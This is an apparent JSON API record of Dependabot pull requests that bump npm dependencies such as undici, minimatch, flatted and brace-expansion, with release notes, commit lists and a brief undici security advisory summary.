for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.2.9 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.2.9...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.1.2 to 3.1.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.1.2...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `undici` from 5.28.5 to 6.24.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodejs/undici/releases\"\u003eundici's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev6.24.1\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nodejs/undici/compare/v6.24.0...v6.24.1\"\u003ehttps://github.com/nodejs/undici/compare/v6.24.0...v6.24.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev6.24.0\u003c/h2\u003e\n\u003ch1\u003eUndici v6.24.0 Security Release Notes (LTS)\u003c/h1\u003e\n\u003cp\u003eThis release backports fixes for security vulnerabilities affecting the v6 line.\u003c/p\u003e\n\u003ch2\u003eUpgrade guidance\u003c/h2\u003e\n\u003cp\u003eAll users on v6 should upgrade to \u003cstrong\u003ev6.24.0\u003c/strong\u003e or later.\u003c/p\u003e\n\u003ch2\u003eFixed advisories\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm\"\u003eGHSA-2mjp-6q6p-2qxm\u003c/a\u003e / CVE-2026-1525 (Medium)\u003cbr /\u003e\nInconsistent interpretation of HTTP requests (request/response smuggling class issue).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj\"\u003eGHSA-f269-vfmq-vjvj\u003c/a\u003e / CVE-2026-1528 (High)\u003cbr /\u003e\nMalicious WebSocket 64-bit frame length handling could crash the client.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq\"\u003eGHSA-4992-7rv2-5pvq\u003c/a\u003e / CVE-2026-1527 (Medium)\u003cbr /\u003e\nCRLF injection via the \u003ccode\u003eupgrade\u003c/code\u003e option.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8\"\u003eGHSA-v9p9-hfj2-hcw8\u003c/a\u003e / CVE-2026-2229 (High)\u003cbr /\u003e\nUnhandled exception from invalid \u003ccode\u003eserver_max_window_bits\u003c/code\u003e in WebSocket permessage-deflate negotiation.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q\"\u003eGHSA-vrm6-8vpv-qv8q\u003c/a\u003e / CVE-2026-1526 (High)\u003cbr /\u003e\nUnbounded memory consumption in WebSocket permessage-deflate decompression.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNot applicable to v6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h\"\u003eGHSA-phc3-fgpg-7m6h\u003c/a\u003e / CVE-2026-2581 affects \u003ccode\u003e\u0026gt;= 7.17.0 \u0026lt; 7.24.0\u003c/code\u003e only.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eAffected and patched ranges (v6)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2026-1525: affected \u003ccode\u003e\u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCVE-2026-1528: affected \u003ccode\u003e\u0026gt;= 6.0.0 \u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCVE-2026-1527: affected \u003ccode\u003e\u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCVE-2026-2229: affected \u003ccode\u003e\u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCVE-2026-1526: affected \u003ccode\u003e\u0026lt; 6.24.0\u003c/code\u003e, patched \u003ccode\u003e6.24.0\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eReferences\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eGitHub Security Advisories: \u003ca href=\"https://github.com/nodejs/undici/security/advisories\"\u003ehttps://github.com/nodejs/undici/security/advisories\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-1525: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-1525\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-1525\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-1528: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-1528\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-1528\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-1527: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-1527\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-1527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-2229: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-2229\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-2229\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNVD CVE-2026-1526: \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2026-1526\"\u003ehttps://nvd.nist.gov/vuln/detail/CVE-2026-1526\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/c0cf656ef5e66f7372a7e57d08c6cbdd5b127e82\"\u003e\u003ccode\u003ec0cf656\u003c/code\u003e\u003c/a\u003e Bumped v6.24.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/f5a9f0ccbe958e7d0cfd7b63a9a8d195378ac6f6\"\u003e\u003ccode\u003ef5a9f0c\u003c/code\u003e\u003c/a\u003e Fix v6 release workflow branch targeting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/af2cb8fe01320f189394bef193c2d5b441fcfe6f\"\u003e\u003ccode\u003eaf2cb8f\u003c/code\u003e\u003c/a\u003e wqremove maxDecompressedMessageSize (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/4891\"\u003e#4891\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/8873c947271faf1ebc455bdc6158ecbc022ecfa9\"\u003e\u003ccode\u003e8873c94\u003c/code\u003e\u003c/a\u003e Bumped v6.24.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/411bd01a42e7917009bbf686f7628b99d67bbce9\"\u003e\u003ccode\u003e411bd01\u003c/code\u003e\u003c/a\u003e test(websocket): use node:assert for Node 18 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/844bf59699d778944f78a24ae819c0e8f295766e\"\u003e\u003ccode\u003e844bf59\u003c/code\u003e\u003c/a\u003e test: fix http2 lint regressions in backport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/a444e4f13e8958b4e1ac42bc0d53ace7fba0a9c1\"\u003e\u003ccode\u003ea444e4f\u003c/code\u003e\u003c/a\u003e test: stabilize h2 and tls-cert-leak under current test runner\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/dc032a1050d5489b8ce9b4c22aafba98a942f87b\"\u003e\u003ccode\u003edc032a1\u003c/code\u003e\u003c/a\u003e fix: h2 CI (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/4395\"\u003e#4395\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/4cd3f4b3a2ef910ba728c47ae78294d956410450\"\u003e\u003ccode\u003e4cd3f4b\u003c/code\u003e\u003c/a\u003e test: increase bitness in \u003ccode\u003etest/fixtures/*.pem\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/3659\"\u003e#3659\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/7df6442194b7a54e9ac734335e6e0a56a9bc6666\"\u003e\u003ccode\u003e7df6442\u003c/code\u003e\u003c/a\u003e fix: adapt websocket frame-limit handling for v6 parser\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.5...v6.24.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for undici since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Sin-Estres-dev/setup-node/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Sin-Estres-dev/setup-node/pull/6","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sin-Estres-dev%2Fsetup-node/issues/6","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/6/packages"}},{"old_version":"2.17.0","new_version":"11.4.4-cjs.2","update_type":"major","path":null,"pr_created_at":"2026-03-17T23:32:07.000Z","version_change":"2.17.0 → 11.4.4-cjs.2","issue":{"uuid":"4091765545","node_id":"PR_kwDOJkwVw87LYKfw","number":10,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 34 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-03-19T21:55:18.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-17T23:32:07.000Z","updated_at":"2026-03-19T21:55:20.000Z","time_to_close":166991,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":34,"packages":[{"name":"fast-xml-parser","old_version":"4.2.2","new_version":"5.5.6","repository_url":"https://github.com/NaturalIntelligence/fast-xml-parser"},{"name":"glob","old_version":"10.2.3","new_version":"10.5.0","repository_url":"https://github.com/isaacs/node-glob"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"jsonpath","old_version":"1.1.1","new_version":"1.3.0","repository_url":"https://github.com/dchester/jsonpath"},{"name":"path-to-regexp","old_version":"6.2.1","new_version":"6.3.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"path-to-regexp","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"express","old_version":"4.18.2","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"form-data","old_version":"4.0.0","new_version":"4.0.4","repository_url":"https://github.com/form-data/form-data"},{"name":"gatsby","old_version":"4.23.1","new_version":"4.25.9","repository_url":"https://github.com/gatsbyjs/gatsby"},{"name":"@babel/runtime-corejs3","old_version":"7.13.9","new_version":"7.29.2","repository_url":"https://github.com/babel/babel"},{"name":"@babel/traverse","old_version":"7.21.5","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.17.0","new_version":"11.4.4-cjs.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"brace-expansion","old_version":"1.1.8","new_version":"1.1.12","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"follow-redirects","old_version":"1.15.2","new_version":"1.15.11","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"socket.io-parser","old_version":"3.3.3","new_version":"3.3.5","repository_url":"https://github.com/socketio/socket.io"},{"name":"get-func-name","old_version":"2.0.0","new_version":"2.0.2","repository_url":"https://github.com/chaijs/get-func-name"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"jws","old_version":"3.2.2","new_version":"3.2.3","repository_url":"https://github.com/brianloveswords/node-jws"},{"name":"lodash","old_version":"4.17.21","new_version":"4.17.23","repository_url":"https://github.com/lodash/lodash"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"postcss","old_version":"8.3.11","new_version":"8.5.8","repository_url":"https://github.com/postcss/postcss"},{"name":"sharp","old_version":"0.30.7","new_version":"0.32.6","repository_url":"https://github.com/lovell/sharp"},{"name":"svgo","old_version":"2.8.0","new_version":"2.8.2","repository_url":"https://github.com/svg/svgo"},{"name":"word-wrap","old_version":"1.2.3","new_version":"1.2.5","repository_url":"https://github.com/jonschlinkert/word-wrap"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) | `4.2.2` | `5.5.6` 